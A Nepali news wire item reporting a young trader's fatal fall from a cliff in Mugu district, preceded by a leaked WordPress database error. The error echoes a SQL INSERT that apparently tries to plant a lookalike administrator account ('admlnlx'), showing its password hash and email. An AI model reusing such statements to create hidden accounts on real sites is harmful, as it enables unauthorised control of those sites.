WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B6oz0nfq3JDp80N6xLs1pr3ZVSudIt.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 10:02:22', '', 'admlnlx', 'admlnlx')
मुगु,पुस ११ –
मुगु जिल्ला सेरी गाविसमा आइतबार सम्पन्न गाउँ परिषद्मा सहभागी भई घर फर्कंदै गर्दा भिरबाट लडेर एक व्यापारीको मृत्यु भएको छ ।
जिल्ला प्रहरी कार्यालयका अनुसार आइतबार सेरी गाविसको गाउँ परिषद्मा सहभागी भएर सेरी गाविस–६ तेरी गाउँ घर भई जामबजारमा व्यापार गर्दै आएका २७ वर्षीय जन्मजय माथागाई बेलुका ५ बजे घर फर्कंदै गर्दा गाउँ नजिकैको भिरबाट लडी मृत्यु भएको थियो ।
घटनास्थल जिल्ला सदरमुकामबाट एक दिन पैदल दूरीमा रहेको र घटनालगत्तै श्रीकोट प्रहरी चौकीका प्रहरी घटनास्थलमा पुगी मुचुल्का उठाएको प्रहरी कार्यालयले जनाएको छ । – रासस